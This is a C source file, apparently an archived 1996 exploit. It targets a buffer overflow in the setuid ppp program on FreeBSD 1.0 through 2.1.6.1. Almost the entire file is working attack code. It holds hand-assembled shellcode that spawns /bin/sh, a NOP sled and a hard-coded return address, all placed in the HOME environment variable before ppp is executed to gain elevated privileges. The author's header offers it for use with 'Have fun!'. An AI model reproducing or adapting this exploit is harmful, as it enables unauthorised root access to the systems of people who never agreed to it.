/*                                                                     [2000]*/
/*                                 Hi !                                [2000]*/
/*        This is buffer overflow exploit for ppp bug (FreeBSD 2.1.0). [2000]*/
/*           If you have any problems with it, drop me a letter.       [2000]*/
/*                              Have fun !                             [2000]*/
/*                                                                     [2000]*/
/*                                                                     [2000]*/
/*                         ----------------------                      [2000]*/
/*             ---------------------------------------------           [2000]*/
/*  -----------------   Dedicated to my beautiful lady   ------------------  */
/*             ---------------------------------------------           [2000]*/
/*                         ----------------------                      [2000]*/
/*                                                                     [2000]*/
/*         Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su  [2000]*/
/*                                                                     [2000]*/
/* SYSTEMS AFFECTED                                                    [2000]*/
/*                                                                     [2000]*/
/*    FreeBSD 1.0, 1.1, 2.1.0, 2.1.5, 2.1.6, 2.1.6.1                   [2000]*/

#include <stdio.h>
main()
{
#define length 114
  int i;
  unsigned long start_addr;
  char home_string[length];
  char *env[]={
    home_string,
    NULL
  };
  char code_string[]=
    {
      "\xeb\x2a"                         /* jmp    cont         [2000]*/

      /* geteip: */           "\x5d"                             /* popl   %ebp         [2000]*/
      "\x55"                             /* pushl  %ebp         [2000]*/
      "\xfe\x4d\xe7"                     /* decb   0xffffffe7(%ebp)   */
      "\xfe\x4d\xeb"                     /* decb   0xffffffeb(%ebp)   */
      "\xfe\x4d\xec"                     /* decb   0xffffffec(%ebp)   */
      "\xfe\x4d\xed"                     /* decb   0xffffffed(%ebp)   */
      "\xff\x45\xef"                     /* incl   0xffffffef(%ebp)   */
      "\xfe\x4d\xf4"                     /* decb   0xfffffff4(%ebp)   */
      "\xc3"                             /* ret                 [2000]*/

      /* 0xffffffe0(%ebp): */ "/bin/sh"
      /* 0xffffffe7(%ebp): */ "\x01"

      /* execve:     [2000]*/ "\x8d\x05\x3b\x01\x01\x01"         /* leal   0x3b,%eax    [2000]*/
      "\x9a\xff\xff\xff\xff\x07\x01"     /* lcall  0x7,0x0      [2000]*/

      /* cont:  */            "\xc7\xc4XXXX"                     /* movl   $0xXXXXXXXX,%esp   */
      "\xe8\xcb\xff\xff\xff"             /* call   geteip       [2000]*/
      "\x81\xc5\xef\xff\xff\xff"         /* addl   $0xffffffef,%ebp   */
      "\x55"                             /* pushl  %ebp         [2000]*/
      "\x55"                             /* pushl  %ebp         [2000]*/
      "\x81\xc5\xf1\xff\xff\xff"         /* addl   $0xfffffff1,%ebp   */
      "\x55"                             /* pushl  %ebp         [2000]*/
      "\xe8\xd4\xff\xff\xff"             /* call   execve       [2000]*/
    };

  for(i=0;i<length-2;home_string[i++]='\x90');
  home_string[length-1]='\0';

  start_addr=0xefbfde83;
  *( (unsigned long*) strstr(code_string,"XXXX") )=start_addr;

  strncpy(home_string,"HOME=",5);
  strncpy(&home_string[5],code_string,strlen(code_string));
  *( (unsigned long*) &home_string[length-5])=start_addr;

  execle("/usr/sbin/ppp","/usr/sbin/ppp",NULL,env);

}
/*                    www.hack.co.za              [2000]*/